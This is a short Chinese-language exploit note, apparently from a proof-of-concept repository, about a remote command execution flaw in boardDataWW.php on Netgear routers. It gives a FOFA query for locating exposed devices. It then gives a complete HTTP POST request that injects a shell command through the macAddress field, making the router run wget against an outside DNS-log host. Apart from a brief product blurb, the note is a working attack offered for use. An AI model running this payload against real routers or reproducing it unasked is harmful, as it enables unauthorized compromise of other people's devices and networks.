POC/wpoc/路由器/Netgear路由器boardDataWW.php存在RCE漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

21 lines
679 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## Netgear路由器boardDataWW.php存在RCE漏洞
NetGear是一家知名的网络设备制造商其路由器产品线多样化性能稳定易用性强安全性高并提供良好的技术支持和售后服务。适合家庭和企业用户使用是可靠的网络设备品牌选择。
该产品boardDataWW.php处存在RCE漏洞恶意攻击者可能会利用此漏洞执行恶意命令最终导致服务器失陷。
## fofa
```
title=="Netgear"
```
## poc
```
POST /boardDataWW.php HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2Fnstucl.dnslog.cn%23&reginfo=0&writeData=Submit
```